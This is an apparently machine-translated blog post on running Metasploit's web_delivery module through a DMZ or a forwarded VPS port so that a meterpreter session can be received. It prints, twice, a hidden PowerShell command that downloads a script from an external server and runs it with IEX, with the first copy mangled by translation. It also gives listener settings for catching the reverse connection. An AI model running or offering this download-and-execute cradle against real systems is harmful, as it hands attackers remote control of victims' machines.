using web in dmz

Posted by trammel at 2020-03-03

Introduction to using web delivery in DMZ

Published on May 13, 2016 |, classified in strange and obscene skills

In the previous problems, when setting [b] web delivery [/ b], it was found that the script could not run if the lhost was set to the external IP address. If it was set to the internal IP address, the rebound payload rebound address is the internal address, that is, it is impossible to get the session, check the detailed configuration information, and find that there is a reverse Lister bindaddress Set the option to solve this problem. Of course, this parameter is also suitable for using local MSF with VPS forwarding port. The detailed configuration is as follows:

Use VPS to forward port 8081 to local port 8081 (web delivery service port)

Use VPS to forward port 6666 to local port 6666 (web delivery payload listening port)

MSF enable and configure web delivery

Client execution: powershell.exe - NOP - W hidden - C $k = new object net. Webclient; $k.proxy = [net. Webrequest]:: getsystemwebproxy(); $k.proxy. Credentials = [net. Credentialcache]:: defaultcredentials; IEX $k.downloadstring ('http: / / Internet IP: 8081 / ');

powershell.exe -nop -w hidden -c $k=new-object net.webclient;$k.proxy=[Net.WebRequest]::GetSystemWebProxy();$k.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $k.downloadstring('http://外网ip:8081/');

Intranet MSF gets the meterpreter session.

In the case of DMZ, port forwarding is not required, only the lhost is set as the IP address of the external network, and the reverselister bindaddress is set as the IP address of the internal network.